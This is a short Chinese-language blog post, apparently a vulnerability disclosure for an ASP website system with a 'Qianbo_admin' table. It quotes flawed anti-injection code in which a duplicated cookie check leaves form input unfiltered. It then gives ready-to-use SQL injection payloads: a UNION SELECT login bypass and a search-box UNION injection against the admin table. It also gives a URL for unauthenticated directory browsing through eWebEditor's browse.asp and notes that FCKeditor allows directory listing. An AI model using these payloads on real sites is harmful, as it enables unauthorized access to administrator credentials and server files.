If EnableStopInjection = True Then

If Request.QueryString <> "" Then Call StopInjection(Request.QueryString)

If Request.Cookies <> "" Then Call StopInjection(Request.Cookies)

If Request.Cookies <> "" Then Call StopInjection2(Request.Form)

End If

========================

防注入开始还是Encode的,通过Echo他们的解码程序,才发现,这里面把cookie是否空判断两次。造成了Form的恶意字符提交。

漏洞证明:一个鸡肋的前台用户登陆Md5值是1,语句写在用户名里,密码写1

' UNION Select 1,1,1,'a0b923820dcc509a',1,1,1,1,1,1,1,1,1,1,1,1,1,1,true,1,1,1 FROM Qianbo_admin Where ''='

 

这个鸡肋的前台登陆只能到达MemberLogin.asp的48行

If UCase(LoginName) = UCase(MemName) And LoginPassword = Password

LoginName取的就是刚刚的那串语句,而查询结果的用户名是1所以卡在了这里

=================================================================

https://www.webshell.cc/system/ewebeditor/asp/browse.asp?action=FOLDER&style=coolblue&cusdir=dir&type=FILE

后台ewebeditor没有做权限的验证,可导致游客直接浏览

FCK也可列目录用本地的Test连上他们的Fck

===================================================================

搜索框中输入

 

%' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from Qianbo_admin where '%'='

==================================================================

一堆鸡肋啊。。

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3327.html